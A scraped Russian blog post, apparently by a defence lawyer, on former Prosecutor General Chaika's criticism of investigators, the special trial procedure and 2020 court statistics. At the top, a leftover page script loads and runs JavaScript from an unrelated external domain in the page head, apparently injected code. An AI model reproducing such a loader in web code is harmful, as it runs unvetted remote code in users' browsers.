, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
RSS
 

Генеральный прокурор был прав, что дальше?

12 Фев

Бывший Генпрокурор РФ Юрий Чайка ещё в 2018 году обрушился https://www.kommersant.ru/doc/3557343    с резкой критикой на деятельность «следственных органов».

По его мнению, для многих российских следователей «уголовно-процессуальное законодательство» и «материальное право» — «это космос». Главе надзорного ведомства не нравится, что до 70% уголовных дел сводится к особому порядку, когда не требуется умения доказать виновность того, кто согласен с предъявленным ему обвинением.

Юрий Чайка считал, что такое расследование расслабляет следователей и приводит к их «деградации».

Отдельные случаи правоприменительной практики доказывали правомерность суждения Генерального прокурора.

Когда обвиняемые не соглашались с предъявленным им обвинением, умения доказать их виновность, уже не было.

В 2008 году присяжные в Москве полностью оправдали https://www.kommersant.ru/doc/1003841   милиционеров в деле о незаконной телефонной прослушке.

Решение о невиновности фигурантов уголовного дела заседатели приняли единогласно.

Коллегия сочла, что следствию не удалось доказать причастность подсудимых к вменяемым им преступлениям.

Я принимал участие в защите одного из обвиняемых. На мои многочисленные жалобы о неправомерном расследовании уголовного дела, я получал отписки.

Но мне всё же удалось убедить следователя в неправомерности обвинения моего доверителя, и он не решился моего подзащитного направить в суд. Сегодня этот следователь, с подачи Путина, стал во главе надзорного ведомства — Генеральной прокуратуры России, сменив Юрия Чайку.

Совещание судей с участием http://www.kremlin.ru/events/president/news/64980   Путина ещё более подтвердило то, о чём говорил Юрий Чайка.

Более 30 процентов дел, направленных в 2020 году в суды, полномочны были прекратить сами следователи и дознаватели.

Но этого сделано не было. А, что в это время делали руководители следственных органов, начальники подразделений дознания, обязанные осуществлять ведомственный контроль?

Почему в отношении 32 процентов обвиняемых, следователи и дознаватели не прекратили уголовное преследование сами, а направили их в суд, который и выполнил за них эту работу?

Зачем было на предварительном следствии кошмарить предпринимателей, если за деяния в сфере предпринимательской и иной экономической деятельности в отношении 38 процентов дел этой категории, уголовное преследование прекращено судом?

Приведённая Председателем Верховного суда РФ В. Лебедевым статистика работы судов за 2020 год, доказывает, что «деградировали» не только следователи, но и лица, осуществляющие ведомственный контроль и прокурорский надзор.

Опять Путину предстоят кадровые перестановки.

Но мне представляется, что надо, прежде всего, привести в порядок действующее законодательство.

Если сотрудники правоохранительных органов, вступая в должность, клянутся «Служить Закону», то и законы не должны быть противоречивыми.

20 июля 2020 года Путин подписал https://www.garant.ru/news/1401731/   закон, который исключает рассмотрение судом уголовного дела о тяжком преступлении (наказание за которое не более 10 лет лишения свободы) в особом порядке судебного разбирательства, то есть при заявленном ходатайстве подсудимого о согласии с предъявленным обвинением и постановлении обвинительного приговора без исследования доказательств. Соответствующие поправки внесены в ст. 314 и ст. 316 Уголовно-процессуального кодекса.

Но это не устранило осуществления особого порядка судебного разбирательства по иным уголовным делам.

А это значит, что продолжают выносить приговоры, не исследуя собранные по делу доказательства, что прямо противоречит Конституции, статьи 49, 59, 51, 55, и порядку судопроизводства, статьям 1, 6, 7, 14, 15, 17, 73, 74,75 части 2 статьи 77, 87, 88 УПК РФ.

Вот, как из такой ситуации выходили судьи в 2020 году.

В особом порядке судебного разбирательства, когда у суда отсутствует возможность исследовать доказательства, прекращены дела в отношении 17 процентов обвиняемых.

Возможно, интуитивно понимая неправомерность обвинения, судьи прекратили дела в отношении этих обвиняемых, руководствуясь только данными, характеризующими личность подсудимых.

 
Комментариев нет

Автор: ossin Категория: Прочие заметки

 

Оставить комментарий

Вы должны войти, чтобы оставить комментарий.